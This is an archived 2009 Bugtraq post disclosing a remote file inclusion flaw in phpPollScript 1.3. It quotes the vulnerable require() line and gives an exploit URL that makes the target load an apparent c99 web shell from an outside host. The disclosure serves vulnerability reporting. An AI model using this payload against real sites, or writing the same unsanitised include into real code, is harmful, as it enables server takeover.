lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20091220114325.30559.qmail@securityfocus.com> Date: 20 Dec 2009 11:43:25 -0000 From: admin@...n0x.com To: bugtraq@...urityfocus.com Subject: phpPollScript - 1.3 Remote File Include #phpPollScript <= 1.3 Remote File Include Vulnerability #Download Script : http://download.tomex.org/phpPollScriptv13b.zip #Author : ZZxxHackerzzXX #Contact : admin@...n0x.com #Location : Turkey ######################################################################## #file : # init.poll.php # line 2 $inc_path = dirname($include_class); # line 3 require ($inc_path."/voting.poll.php"); ######################################################################## #3xplo!t : #http://target.com/[path]/php/init.poll.php?include_class=http://www.ekin0x.com/c99.txt? ######################################################################## #eser@...n0x.com (all crew shell) ########################################################################